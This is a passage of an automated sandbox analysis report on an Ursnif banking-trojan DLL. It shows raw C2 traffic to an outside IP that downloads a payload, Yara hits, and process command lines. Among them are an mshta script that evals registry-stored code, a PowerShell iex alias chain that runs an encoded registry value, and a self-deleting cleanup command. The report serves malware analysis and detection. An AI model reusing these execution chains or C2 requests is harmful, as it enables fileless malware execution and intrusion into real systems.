eb bf ca ae d2 49 96 b6 8a 04 ab fa 95 77 fa 63 0a 7a 0d 95 a1 96 99 44 58 4c cf 57 ae a4 39 c8 34 1e 91 57 0a 36 63 09 ab 63 76 c2 c1 18 dd ac c2 70 bf 06 25 e6 27 5d fc f2 4f 2b 48 d4 2b 9b aa 75 25 b7 70 f5 86 3b 83 06 05 3f 10 6e 86 51 69 da a6 a8 0d 8f 67 9f 77 dd f3 f1 bc a3 2b 9b cc 07 3c cd d5 4d 2e 5b 8d 0a 6e f3 42 ee 85 31 81 12 49 42 23 da f6 e0 21 58 34 f1 98 44 20 e0 34 20 6c e2 a7 e9 96 39 bf 64 eb 96 ab af dd c2 e5 93 2f 77 12 5b 31 b6 d4 8e 98 e1 b0 b9 97 01 7b 07 2a 86 59 bd e8 00 a8 a3 36 12 48 2c f4 25 13 19 ba df bb ee 61 56 99 a8 ad 21 38 93 bd 47 26 58 af f0 db 46 7b b6 65 aa de cd dc 57 71 ed 57 29 3c a1 90 6f b4 ca a6 dc 2b a1 45 2a 15 3d 27 0d 14 ac e3 a7 f3 ce f4 a4 99 60 7c d7 95 79 41 ca 61 9a 6f 54 40 1a 4e 73 8d c8 57 85 c6 32 d8 e6 76 bd 9e 2b c8 77 57 64 55 68 1e e8 b8 ce e3 27 ea 88 e0 6b 84 d6 22 a8 40 53 1f fe fd 7f 2c 64 e5 e3 c0 ba b0 7c 8c 1f 0a 1f 3d a3 aa df 4c 84 66 69 de c4 52 16 4a cb 9d 1b 22 74 04 be b4 75 aa ac 10 43 9c 84 24 1d 8b bb 5b c6 a9 da 99 7a c4 10 3c d8 88 4e 6f 5d 84 05 33 69 2b e5 f6 16 bf 76 b7 e2 b7 61 1a 36 95 4b 28 79 75 83 0d af 82 36 39 fb e4 c0 3c c2 32 b4 cc c4 35 09 29 45 a8 bf a7 f5 c5 b1 91 71 b2 a5 a9 77 0d 1f 79 f3 f3 6c a3 ab 52 a9 26 9e df 64 d9 64 a6 4f 74 f8 7f be 12 b6 01 54 bd bc e1 a6 7e 85 e2 01 e7 11 f6 40 6c 49 4a e2 ec 18 e1 9b c7 7e 26 d7 09 41 4c b1 bd cb b6 91 c6 24 7f 1a 3d 1b 36 89 c0 c2 20 6c 33 01 13 79 75 f9 66 8c 40 13 41 38 66 3a 0f 9b 37 54 93 3b 5b 14 19 90 ea 68 99 54 78 3a f9 f4 73 f6
                      Data Ascii: ;Lk%p-z7d11_mE4*r3)]l3Y}Y,DH\MN(DSG%VH&[y??{#M4nRQN'I30RvYIEu|gC3XZ+128kVr B!{k)/coC33V40yjp.[/_B7#^Cj96,O4sR;2\kz'X1Cg.dj_@'!zY$h,5jQ0h<B\hnd2OiVG' Kn'B>$J<I0i~gcRnV;baJG_D|sVB/9'(!$d+IwczDXLW94W6ccvp%']O+H+u%p;?nQigw+<M.[nB1IB#!X4D 4 l9d/w[1{*Y6H,%aV!8G&XF{eWqW)<o+E*='`|yAaoT@NsW2v+wWdUh'k"@S,d|=LfiRJ"tuC$[z<No]3i+va6K(yu69<25)EqwylR&ddOtT~@lIJ~&AL$=6 l3yuf@A8f:7T;[hTx:s
                      May 4, 2022 16:27:54.122081995 CEST1665OUTGET /drew/DI9hOfnq4sis3AGOPt/_2FSN_2BC/vQMmpDQPqFMgJd7cY2BM/bpPiaoMoE2NRqo_2F46/T_2F2moLttcApM2j8JSDhs/WTmAL93U1NjUV/LMXna7GA/0XrWXSOJuSDBIpGqh8yB0Uw/8wBvAy1ROY/CU6_2BgS3mg1oC_2F/fr7BBq_2FOIM/8zgmlDNHCEg/MQH_2B5kPaL7jc/fyWcKgX2hWtfe66c_2BLA/pYfH_2BKPQZE6m8n/dgy8gM_2BVyJKF1/06D2L7PXyZQ5x_2F0m/7pDuXDGuxyU/cHq.jlk HTTP/1.1
                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                      Host: 185.189.151.28
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      May 4, 2022 16:27:54.411616087 CEST1667INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Wed, 04 May 2022 14:27:54 GMT
                      Content-Type: application/octet-stream
                      Content-Length: 1856
                      Connection: keep-alive
                      Pragma: public
                      Accept-Ranges: bytes
                      Expires: 0
                      Cache-Control: must-revalidate, post-check=0, pre-check=0
                      Content-Disposition: inline; filename="62728d6a5f4fa.bin"
                      Data Raw: 9b a0 46 9f fb 74 7e 4c 02 9a 3e fd d9 71 c7 75 b7 c0 cf a4 f1 8f 69 7b ca 68 40 93 06 4e b2 61 6c 45 b6 60 ec c8 ae 61 ba a7 30 65 32 00 93 c4 61 b5 26 75 0f 9c 24 d6 6b 8d 49 83 bd 29 e5 c2 8e 84 e2 03 a7 53 8f 50 53 4e 60 d2 b0 83 79 b0 30 aa 56 2b de 37 b8 1e 29 a1 fe 12 f0 a4 8a b6 1c 50 54 8d e2 11 22 11 00 28 bf 5a 8e 88 5c f1 a5 ea 66 e4 d9 1d 25 32 3c 0d b9 88 74 8f 8e 4d dd 6f 8d 0c ff 3b fb ab 12 a8 aa 7b 3c 4a 84 d1 1c 81 c0 03 d3 5a f7 ca 0e 84 a2 cd bf 4b 4b 8a 9a a7 0b 3b 18 09 93 80 bd 2c 22 aa 10 18 d9 46 7f 3f 4a 98 a1 32 15 53 4d 52 37 e7 3d fc df 0b 99 86 dc 6e 28 45 31 41 af 5b f3 54 b8 c3 c4 0e de b4 8c 35 e7 ae 58 26 d9 51 48 2a a9 7c 38 bf 34 02 be a4 a2 60 c2 f2 a1 0b a5 b7 b8 45 00 65 8d 87 9e 0f 13 57 99 55 9c 6f 29 be 48 cb 2b 94 3e 15 dc a9 ca 66 19 e4 4b 96 5f 82 fb 25 15 6c e8 81 ba c7 c6 11 8f a6 22 f3 d3 46 8e 0a 4e a3 47 a3 43 c4 28 a9 04 8e 33 96 50 fc ff da 85 d8 1a 90 b6 c3 b6 70 00 35 37 e8 e0 9b 16 3a 8f 42 cc df f8 46 d9 65 92 fb a4 09 89 80 4b ed 32 53 0c fb 12 10 01 3c a7 65 18 1f 85 a3 3d 19 3b 35 60 ca 34 5d 34 52 31 52 97 a4 f7 e9 c8 a8 6d fd aa 00 d9 1a 03 b4 cf d3 6b 1d c9 a9 fb 98 be 9e ee 6e 98 aa dc 13 43 f5 f1 a4 c8 15 60 ac 89 bc 66 0e c3 5c 86 cf 87 08 78 b0 d7 93 ca a5 f3 d7 df 9f 82 0e 0c 47 f8 ba bb 22 96 1d 41 af ad 20 bb 3b f4 7c 43 d6 33 6b c5 a7 00 ad c7 e3 85 36 3d a9 cd ff 43 13 5d 1a 98 65 a5 39 a0 04 97 16 f2 aa 48 11 c3 92 11 ad e2 6c a1 be f1 26 93 a6 ac 32 e7 cb 42 6c f0 44 33 e2 1d 8e ae 3e b7 6c 0e 9d d6 61 ea 8a 3d 3b f9 10 d5 5e 6f e6 95 69 c6 71 9b d9 76 5a d7 a6 6d 73 3c 9c 16 98 fe 91 6c 22 21 a9 0d a3 b8 32 ec 0c e2 56 21 bd 0f b2 d9 7d 28 84 dc 5c 0a d0 73 cb ab bd 78 b6 e9 06 c7 a0 94 a6 59 4e d2 71 5b 21 08 5b 65 ac e4 58 76 1e 02 c8 9f 0d dd e0 90 25 a2 63 d5 df 0d 62 e9 e1 79 ab 4a 3b 73 dc 24 a2 34 4b 8e f7 84 e2 34 b7 48 aa f8 38 8e 40 82 ea 3e f7 65 c4 e9 55 1e 1c 09 eb 5f e8 d6 e0 be 03 c7 53 d9 7b 75 89 9d 91 ca e8 cf 8b fc 0e a2 1d 8b 29 79 32 6b ce 7d 50 cd 11 62 8e 9f e2 49 17 42 32 80 05 48 f4 b4 02 6d 95 48 d1 8f cf 58 79 80 88 10 83 25 2d 9c d3 a5 62 18 d5 cb e7 f6 ab c9 05 71 9d 97 91 57 12 95 83 e4 1e 21 ce 98 59 64 61 16 0c bc 86 44 3f 1e 63 85 6a b9 bb dc da c8 93 85 f0 15 ac 87 e7 0f bb 30 62 68 64 d9 35 20 8f a7 46 82 e0 bf e8 92 a0 37 1b 44 4e 09 c2 70 7b 5d ca 65 06 92 d7 1f 02 40 68 d8 f9 ce fe 22 b9 52 d6 37 3d 79 f5 4c bd 14 0c 30 6c e6 2b 48 c0 26 30 b8 43 9d de c8 55 66 eb 9d 88 ce 14 7f 49 50 c5 3f 64 97 0f 7a 4f 48 80 11 af 12 1c 95 66 bf ed ec e1 bd 12 35 7c da 51 24 8f b3 9f f8 1f 9b c0 d9 50 46 63 0f d2 4e 5c 43 00 32 a9 65 5a c3 30 73 8d 98 fa ff 3a 7d c3 b4 d5 ea d1 45 9c 4b 6c 69 1c f6 b4 3a 55 5c 5c 0e de 2a c7 47 93 6d ec 2b 02 99 c6 7b 5d ce 41 e3 ee c9 91 46 6e d4 10 d2 83 3e f6 91 b5 c3 ce d1 b9 12 29 94 e4 5a 7d ac dd 03 fc 4e 8f 4c 65 3e b6 12 c0 2b 6d 73 2a f6 b1 df bd a5 1d 5a 13 b6 7f a5 ca e1 33 ca 6b a4 88 3e c4 2e dd b1 9f 2c 6b 18 5e de cf fe 3b 59 3c 35 5f cf 58 4b 80 b6 2b aa 8f fe 2c ed d8 3b 2e 42 bb af 6f c1
                      Data Ascii: Ft~L>qui{h@NalE`a0e2a&u$kI)SPSN`y0V+7)PT"(Z\f%2<tMo;{<JZKK;,"F?J2SMR7=n(E1A[T5X&QH*|84`EeWUo)H+>fK_%l"FNGC(3Pp57:BFeK2S<e=;5`4]4R1RmknC`f\xG"A ;|C3k6=C]e9Hl&2BlD3>la=;^oiqvZms<l"!2V!}(\sxYNq[![eXv%cbyJ;s$4K4H8@>eU_S{u)y2k}PbIB2HmHXy%-bqW!YdaD?cj0bhd5 F7DNp{]e@h"R7=yL0l+H&0CUfIP?dzOHf5|Q$PFcN\C2eZ0s:}EKli:U\\*Gm+{]AFn>)Z}NLe>+ms*Z3k>.,k^;Y<5_XK+,;.Bo


                      Statistics

                      Behavior

                      Click to jump to process

                      System Behavior

                      General

                      Target ID:0
                      Start time:16:27:10
                      Start date:04/05/2022
                      Path:C:\Windows\System32\loaddll32.exe
                      Wow64 process (32bit):true
                      Commandline:loaddll32.exe "C:\Users\user\Desktop\xaj0e933Uv.dll"
                      Imagebase:0xe90000
                      File size:116736 bytes
                      MD5 hash:7DEB5DB86C0AC789123DEC286286B938
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      General

                      Target ID:1
                      Start time:16:27:10
                      Start date:04/05/2022
                      Path:C:\Windows\SysWOW64\cmd.exe
                      Wow64 process (32bit):true
                      Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\xaj0e933Uv.dll",#1
                      Imagebase:0x1190000
                      File size:232960 bytes
                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      General

                      Target ID:2
                      Start time:16:27:11
                      Start date:04/05/2022
                      Path:C:\Windows\SysWOW64\rundll32.exe
                      Wow64 process (32bit):true
                      Commandline:rundll32.exe "C:\Users\user\Desktop\xaj0e933Uv.dll",#1
                      Imagebase:0x10e0000
                      File size:61952 bytes
                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.297325888.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000002.464317231.000000000526F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.297834584.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.343634422.0000000005569000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.297429352.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.461814934.0000000005049000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.297681439.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.343681335.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.297590765.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.344393693.00000000053EC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.343553499.00000000054EA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.297638770.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.297792500.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.342664941.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.297847872.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.397268016.0000000006168000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      Reputation:high

                      General

                      Target ID:17
                      Start time:16:27:58
                      Start date:04/05/2022
                      Path:C:\Windows\System32\mshta.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\System32\mshta.exe" "about:<hta:application><script>Jqlc='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Jqlc).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                      Imagebase:0x7ff63b5a0000
                      File size:14848 bytes
                      MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      General

                      Target ID:18
                      Start time:16:28:00
                      Start date:04/05/2022
                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name axgpbo -value gp; new-alias -name slctai -value iex; slctai ([System.Text.Encoding]::ASCII.GetString((axgpbo "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Imagebase:0x7ff6ba650000
                      File size:447488 bytes
                      MD5 hash:95000560239032BC68B4C2FDFCDEF913
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:.Net C# or VB.NET
                      Yara matches:
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000012.00000003.415812093.000001E636EFC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      Reputation:high

                      General

                      Target ID:19
                      Start time:16:28:01
                      Start date:04/05/2022
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff647620000
                      File size:625664 bytes
                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      General

                      Target ID:21
                      Start time:16:28:12
                      Start date:04/05/2022
                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m5pod5s5\m5pod5s5.cmdline
                      Imagebase:0x7ff71b4c0000
                      File size:2739304 bytes
                      MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:.Net C# or VB.NET
                      Reputation:moderate

                      General

                      Target ID:22
                      Start time:16:28:14
                      Start date:04/05/2022
                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5F15.tmp" "c:\Users\user\AppData\Local\Temp\m5pod5s5\CSCDE04DA8616441A6AC3074D39CFFC1D3.TMP"
                      Imagebase:0x7ff66f440000
                      File size:47280 bytes
                      MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate

                      General

                      Target ID:24
                      Start time:16:28:17
                      Start date:04/05/2022
                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\a1gxko15\a1gxko15.cmdline
                      Imagebase:0x7ff71b4c0000
                      File size:2739304 bytes
                      MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:.Net C# or VB.NET

                      General

                      Target ID:25
                      Start time:16:28:18
                      Start date:04/05/2022
                      Path:C:\Windows\System32\control.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\control.exe -h
                      Imagebase:0x7ff62ce00000
                      File size:117760 bytes
                      MD5 hash:625DAC87CB5D7D44C5CA1DA57898065F
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000019.00000000.414668534.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000019.00000000.413947295.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000019.00000003.416371744.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000019.00000000.415531783.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000019.00000003.416255152.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security

                      General

                      Target ID:26
                      Start time:16:28:19
                      Start date:04/05/2022
                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES73F5.tmp" "c:\Users\user\AppData\Local\Temp\a1gxko15\CSCE08F5B5052974B07835021DDCFF1297.TMP"
                      Imagebase:0x7ff66f440000
                      File size:47280 bytes
                      MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      General

                      Target ID:29
                      Start time:16:28:30
                      Start date:04/05/2022
                      Path:C:\Windows\explorer.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\Explorer.EXE
                      Imagebase:0x7ff6f3b00000
                      File size:3933184 bytes
                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      General

                      Target ID:33
                      Start time:16:28:47
                      Start date:04/05/2022
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\xaj0e933Uv.dll
                      Imagebase:0x7ff7bb450000
                      File size:273920 bytes
                      MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      General

                      Target ID:34
                      Start time:16:28:48
                      Start date:04/05/2022
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff647620000
                      File size:625664 bytes
                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      General

                      Target ID:36
                      Start time:16:28:48
                      Start date:04/05/2022
                      Path:C:\Windows\System32\PING.EXE
                      Wow64 process (32bit):false
                      Commandline:ping localhost -n 5
                      Imagebase:0x7ff726940000
                      File size:21504 bytes
                      MD5 hash:6A7389ECE70FB97BFE9A570DB4ACCC3B
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      General

                      Target ID:37
                      Start time:16:28:56
                      Start date:04/05/2022
                      Path:C:\Windows\System32\RuntimeBroker.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                      Imagebase:0x7ff6b45b0000
                      File size:99272 bytes
                      MD5 hash:C7E36B4A5D9E6AC600DD7A0E0D52DAC5
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      General

                      Target ID:39
                      Start time:16:29:47
                      Start date:04/05/2022
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):
                      Commandline:cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\ADE6.bi1"
                      Imagebase:
                      File size:273920 bytes
                      MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      Disassembly

                      No disassembly